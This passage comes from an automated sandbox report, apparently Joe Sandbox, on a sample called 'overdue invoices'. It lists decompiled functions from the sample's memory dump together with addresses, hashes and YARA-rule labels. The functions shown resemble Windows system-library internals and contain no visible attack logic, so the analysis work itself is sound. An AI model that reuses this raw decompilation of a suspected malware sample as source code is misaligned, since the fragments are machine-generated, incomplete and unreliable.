				return L009DB640(E009D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                  0x00a5138a
                  0x00a5138a
                  0x00a51399
                  0x00a513a3
                  0x00a513a8
                  0x00a513aa
                  0x00a513b5
                  0x00a513bb
                  0x00a513c3
                  0x00a513c6
                  0x00a513c9
                  0x00a513d4
                  0x00a513e6
                  0x00a513d6
                  0x00a513df
                  0x00a513df
                  0x00a513f1
                  0x00a513f2
                  0x00a513f4
                  0x00a5140e

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f5f0be4abe2282dcaa132345c57c2586dfad4c56e7dbeb6ab4787ed4a23a3cb9
                  • Instruction ID: 27df46abc80e4741854676ad155e714237f51bd8c4228bafc9b4e9515d94963f
                  • Opcode Fuzzy Hash: f5f0be4abe2282dcaa132345c57c2586dfad4c56e7dbeb6ab4787ed4a23a3cb9
                  • Instruction Fuzzy Hash: A3015271A44218AFCB14DFA9D842FAEB7B8EF84710F404166B905EB381D674DA05C795
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009958EC Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E009958EC(void* __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				void* _t17;
				void* _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0xa8d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x975c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00995943() != 0 &&  *0xa85320 > 5) {
					E00A17B5E( &_v44, _t27);
					_t22 =  &_v28;
					E00A17B5E( &_v28, _t28);
					_t11 = E00A17B9C(0xa85320, 0x97bf15,  &_v28, _t22, 4,  &_v76);
				}
				return L009DB640(_t11, _t17, _v8 ^ _t29, 0x97bf15, _t27, _t28);
			}















                  0x009958fb
                  0x009958fe
                  0x00995906
                  0x0099590a
                  0x0099593c
                  0x0099593c
                  0x0099590c
                  0x0099590c
                  0x00995911
                  0x00000000
                  0x00995913
                  0x00995913
                  0x00995913
                  0x00995911
                  0x0099591d
                  0x009f1035
                  0x009f103c
                  0x009f103f
                  0x009f1056
                  0x009f1056
                  0x0099593b

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e43bfa49c11b691de86ad005d43dc271549992378fe36e59777b778f1aad04e9
                  • Instruction ID: f8173f85d1b7bf32d23cbaa7d501c42009ec6bb7fa8f5079a4e016ceecfb5517
                  • Opcode Fuzzy Hash: e43bfa49c11b691de86ad005d43dc271549992378fe36e59777b778f1aad04e9
                  • Instruction Fuzzy Hash: 79018431A08908DBDB15EB69DD11AAF77BCEB84360F964069A8059B241DF30DD42C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009AB02A Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E009B7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E00A17016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                  0x009ab037
                  0x009ab039
                  0x009ab03b
                  0x009ab040
                  0x009fa60e
                  0x00000000
                  0x00000000
                  0x009fa61d
                  0x009ab04b
                  0x009ab04e
                  0x009fa627
                  0x009fa634
                  0x00000000
                  0x00000000
                  0x009fa641
                  0x009fa653
                  0x009fa643
                  0x009fa64c
                  0x009fa64c
                  0x009fa65b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009fa66c
                  0x009ab057
                  0x009ab057
                  0x009ab057
                  0x009ab046
                  0x009ab046
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                  • Instruction ID: c04197879c98e94e223c775c40f6b7e4ba5c432cd4abc0355879459246e0f8f5
                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                  • Instruction Fuzzy Hash: 3A018F72204A849FD3228B5CC988F7777ECEB86750F0944A1FA19CBA96D728DC40C761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A61074 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  C-Code - Quality: 54%
                  			E00A61074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v11;
				unsigned int _v12;
				intOrPtr _v15;
				void* __esi;
				void* __ebp;
				unsigned int _t13;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 = _t13;
				if(_a4 != 0) {
					_push((_t13 >> 0x14) + (_t13 >> 0x14));
					L00A6165E(__ebx, 0xa88ae4, (__edx -  *0xa88b04 >> 0x14) + (__edx -  *0xa88b04 >> 0x14), __edi, __ecx, (__edx -  *0xa88b04 >> 0x14) + (__edx -  *0xa88b04 >> 0x14));
				}
				_push( *((intOrPtr*)(_t35 + 0x38)));
				_push( *((intOrPtr*)(_t35 + 0x34)));
				_push(0x8000);
				L00A5AFDE( &_v8,  &_v12);
				if(E009B7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E00A4FE3F(_t22, _t35, _v11, _v15);
				}
				return _t16;
			}












                  0x00a61074
                  0x00a61080
                  0x00a61082
                  0x00a6108a
                  0x00a6108f
                  0x00a61093
                  0x00a610a8
                  0x00a610ab
                  0x00a610ab
                  0x00a610b0
                  0x00a610b7
                  0x00a610be
                  0x00a610c3
                  0x00a610cf
                  0x00a610e1
                  0x00a610d1
                  0x00a610da
                  0x00a610da
                  0x00a610e9
                  0x00a610f5
                  0x00a610f5
                  0x00a610fe

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dc7b1d8ea0c48408b678bd5cd22c92adaff0a595a5b033f658a12d06243c923e
                  • Instruction ID: dd79f778a88424041e4ee34a0564fbe0f931d14a5d0ebd55e04e1e2d93dea0c2
                  • Opcode Fuzzy Hash: dc7b1d8ea0c48408b678bd5cd22c92adaff0a595a5b033f658a12d06243c923e
                  • Instruction Fuzzy Hash: 50014C725047419FC710EF68C945B1ABBF5ABC4310F09C629F88583291DE34D884CB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4FEC0 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E00A4FEC0(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				void* _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0xa8d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E009DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E009B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				return L009DB640(E009D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                  0x00a4fec0
                  0x00a4fec0
                  0x00a4fecf
                  0x00a4fed9
                  0x00a4fede
                  0x00a4fee0
                  0x00a4feeb
                  0x00a4fef3
                  0x00a4fef6
                  0x00a4fef9
                  0x00a4ff04
                  0x00a4ff16
                  0x00a4ff06
                  0x00a4ff0f
                  0x00a4ff0f
                  0x00a4ff21
                  0x00a4ff22
                  0x00a4ff24
                  0x00a4ff3e

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc08adb9d13f7f5798a5acf8055049abbab6c1ce6bbc3921d0fa4642e56d10e6
                  • Instruction ID: 0dff3c9310c8aaec203f617aaf36e40a89e7debc51fa697f16a40f918b15d161
                  • Opcode Fuzzy Hash: cc08adb9d13f7f5798a5acf8055049abbab6c1ce6bbc3921d0fa4642e56d10e6
                  • Instruction Fuzzy Hash: 3D018471A00218AFCB14DBA9D946FAEB7B8EF85710F444066B901AB391EA70DE01C795
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4FE3F Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E00A4FE3F(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				void* _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0xa8d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E009DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E009B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				return L009DB640(E009D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                  0x00a4fe3f
                  0x00a4fe3f
                  0x00a4fe4e
                  0x00a4fe58
                  0x00a4fe5d
                  0x00a4fe5f
                  0x00a4fe6a
                  0x00a4fe72
                  0x00a4fe75
                  0x00a4fe78
                  0x00a4fe83
                  0x00a4fe95
                  0x00a4fe85
                  0x00a4fe8e
                  0x00a4fe8e
                  0x00a4fea0
                  0x00a4fea1
                  0x00a4fea3
                  0x00a4febd

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8c48d8834d849e9ec4b8fffded3776400e268b2f18f2e4360e3541b996ed8517
                  • Instruction ID: e1169faffcaa84a6423cd4c020fb6c437cd811c947818051bfc7a4d95c288300
                  • Opcode Fuzzy Hash: 8c48d8834d849e9ec4b8fffded3776400e268b2f18f2e4360e3541b996ed8517
                  • Instruction Fuzzy Hash: F301A771E04218AFCB14DFA9D846FAEBBB8EF84710F004066F900EB391DA70D901C795
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A68ED6 Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E00A68ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				void* _t35;
				void* _t41;
				void* _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0xa8d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E009B7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				return L009DB640(E009D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42,  *_t29 & 0x000000ff);
			}


















                  0x00a68ed6
                  0x00a68ee5
                  0x00a68eed
                  0x00a68ef0
                  0x00a68efa
                  0x00a68f03
                  0x00a68f0c
                  0x00a68f15
                  0x00a68f24
                  0x00a68f27
                  0x00a68f31
                  0x00a68f43
                  0x00a68f33
                  0x00a68f3c
                  0x00a68f3c
                  0x00a68f4e
                  0x00a68f4f
                  0x00a68f51
                  0x00a68f69

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fdd738b086b5066e7399c618208c6242a369e76f815cb601d3f918d3e8ab9bfd
                  • Instruction ID: 6a59294c870f39f8ccf36c5f5a3a4c0affcdfe76c0241c063cc0e38616db7f8a
                  • Opcode Fuzzy Hash: fdd738b086b5066e7399c618208c6242a369e76f815cb601d3f918d3e8ab9bfd
                  • Instruction Fuzzy Hash: D4111E70A042199FDB04DFA8D541BAEF7F4FF48700F1482AAE518EB382E6349940CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A68A62 Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E00A68A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0xa8d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E009B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				return L009DB640(E009D9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                  0x00a68a62
                  0x00a68a71
                  0x00a68a79
                  0x00a68a82
                  0x00a68a85
                  0x00a68a89
                  0x00a68a8c
                  0x00a68a8f
                  0x00a68a92
                  0x00a68a95
                  0x00a68a9f
                  0x00a68ab1
                  0x00a68aa1
                  0x00a68aaa
                  0x00a68aaa
                  0x00a68abc
                  0x00a68abd
                  0x00a68abf
                  0x00a68ada

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4bcc68132afa1461a838c444f9710530c63f3b473f8f2e41ea48ea6027d05a35
                  • Instruction ID: f3b2a783bf8525bfdadbc585dfeabceac4e2501e12bc61c7683df0993a1ef018
                  • Opcode Fuzzy Hash: 4bcc68132afa1461a838c444f9710530c63f3b473f8f2e41ea48ea6027d05a35
                  • Instruction Fuzzy Hash: 17012CB1A0021CAFCB00DFA9D941AEEB7B8EF88350F50415AF904E7391DB34A901CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099DB60 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0099DB60(intOrPtr* __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *__ecx != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0099DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = L0099E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0099E8B0(__ecx, _t14, 0xfff);
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                  0x0099db64
                  0x0099db66
                  0x0099db6b
                  0x0099dbaa
                  0x0099db71
                  0x0099db76
                  0x0099db7a
                  0x0099dba3
                  0x0099db7c
                  0x0099db87
                  0x0099db8b
                  0x009f4fa1
                  0x009f4fb3
                  0x009f4fb8
                  0x0099db91
                  0x0099db96
                  0x0099db98
                  0x0099db98
                  0x0099db8b
                  0x0099db7a
                  0x0099db9d
                  0x0099dba2

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                  • Instruction ID: 0f57d28644fe8502d1de223aceb0f99e2eda03902dacffd60b306e31850d3684
                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                  • Instruction Fuzzy Hash: D5F0FC332025229BDF325A9D48D0F77B6998FC1B60F2B0435F1059B344CD648C0297D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099B1E1 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0099B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E009B7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E009B7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E00A17016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                  0x0099b1e8
                  0x0099b1ea
                  0x0099b1f3
                  0x009f4a17
                  0x0099b1f9
                  0x0099b1f9
                  0x0099b1f9
                  0x0099b201
                  0x009f4a21
                  0x009f4a2e
                  0x00000000
                  0x00000000
                  0x009f4a3b
                  0x009f4a4d
                  0x009f4a3d
                  0x009f4a46
                  0x009f4a46
                  0x009f4a55
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0099b20a
                  0x0099b20a
                  0x0099b20a
                  0x0099b20a

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                  • Instruction ID: 1530cdb8fbbcde28902fa1b8b59cbc1464b0ffe165fbe7a8668290459be10306
                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                  • Instruction Fuzzy Hash: 4E01F4322446849BD722975DDA04FAABBDCEF91750F1804A1FA248B6B2D77CCC00C314
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A2FE87 Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E00A2FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				void* _t27;
				void* _t32;
				void* _t33;
				void* _t34;
				signed int _t35;

				_v8 =  *0xa8d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E009B7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L009DB640(E009D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}
















                  0x00a2fe96
                  0x00a2fe9e
                  0x00a2fea1
                  0x00a2fead
                  0x00a2feb3
                  0x00a2feb9
                  0x00a2fec3
                  0x00a2fed5
                  0x00a2fec5
                  0x00a2fece
                  0x00a2fece
                  0x00a2fee0
                  0x00a2fee1
                  0x00a2fee3
                  0x00a2fefb

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 879e646e2abe342d492d5b2bec9a9423e6829a2d56a040b7fd04eb024f93a8b6
                  • Instruction ID: 806ce2897017b364dd9d310a4c74350e56d399e6a495c46150cc8ee061e0d92e
                  • Opcode Fuzzy Hash: 879e646e2abe342d492d5b2bec9a9423e6829a2d56a040b7fd04eb024f93a8b6
                  • Instruction Fuzzy Hash: 11018670A0421CEFCB14DFA8D542A6EB7F4FF44700F104169B504DB392D635D901CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A5131B Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E00A5131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0xa8d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E009B7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				return L009DB640(E009D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}















                  0x00a5131b
                  0x00a5132a
                  0x00a51330
                  0x00a51336
                  0x00a5133e
                  0x00a51341
                  0x00a51344
                  0x00a5134f
                  0x00a51361
                  0x00a51351
                  0x00a5135a
                  0x00a5135a
                  0x00a5136c
                  0x00a5136d
                  0x00a5136f
                  0x00a51387

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9c1be42265ec2698c98a7f4557203b229c1b1fd47b13c25aa022a9fa3682fcd
                  • Instruction ID: eadcd0c00e6c821ecee79ec27ec926c6e242e2546fe93352987f7e48dffdf028
                  • Opcode Fuzzy Hash: f9c1be42265ec2698c98a7f4557203b229c1b1fd47b13c25aa022a9fa3682fcd
                  • Instruction Fuzzy Hash: D5011971A05208AFCB44EFA9D546AAEB7F4FF48710F50806AF805EB391E6349A00CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009BC577 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009BC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E009BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x9711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E00A688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                  0x009bc577
                  0x009bc57d
                  0x009bc581
                  0x009bc5b5
                  0x009bc5b9
                  0x009bc5ce
                  0x009bc5ce
                  0x009bc5ca
                  0x00000000
                  0x009bc5ca
                  0x009bc5c4
                  0x009bc5c8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009bc5ad
                  0x00000000
                  0x009bc5af

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 433f8cb3575d19aa71cf7b5bfefd6a4c9fc00e403fe117aa7c4ccdec2d62d413
                  • Instruction ID: cf85d2d56557e98d724b9e486d27977f6228120cffd350d5a3dab18ab9684f2c
                  • Opcode Fuzzy Hash: 433f8cb3575d19aa71cf7b5bfefd6a4c9fc00e403fe117aa7c4ccdec2d62d413
                  • Instruction Fuzzy Hash: 14F09AF292D6909FD7318B288244BA27BEC9B05770F948866F60A87201C6E8FC80C250
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A52073 Relevance: .0, Instructions: 32COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00A52073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E00A4FD22(__ecx);
				_t19 =  *0xa8849c - _t3; // 0x4aea168c
				if(_t19 == 0) {
					__eflags = _t17 -  *0xa88748; // 0x0
					if(__eflags <= 0) {
						E00A51C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0xa88724 & 0x00000004;
							if(( *0xa88724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0xa88724; // 0x0
